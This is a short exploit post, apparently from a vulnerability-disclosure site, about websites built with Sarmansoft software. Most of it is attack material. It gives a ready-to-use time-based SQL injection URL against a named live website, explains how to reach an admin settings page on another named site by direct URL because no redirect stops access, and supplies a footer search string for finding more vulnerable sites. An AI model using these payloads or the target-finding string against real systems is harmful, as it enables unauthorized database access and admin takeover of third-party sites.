SARMANSOFT SQL - NO-REDİRECT PoC

2024.03.20
tr gl0cB (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

I found no-redirect vulnerability and sql vulnerability on some websites prepared with Sarmansoft. In the first example, you can add the "and" "or" parameter and execute your own queries, apart from the database's own query. SQL İNJ (SLEEP) EXAMPLE: https://passionturkey.com/neler.php?id=9%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))nQIP) NO-REDİRECT EXAMPLE: https://uyarlar.com.tr/admin/index.php Replace the address with: /admin/anasayfa_ayarlari.php To find more websites // "® Software & Technology | Sarman Soft Software and Technology Services" My Concat Address: e7967149@gmail.com


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top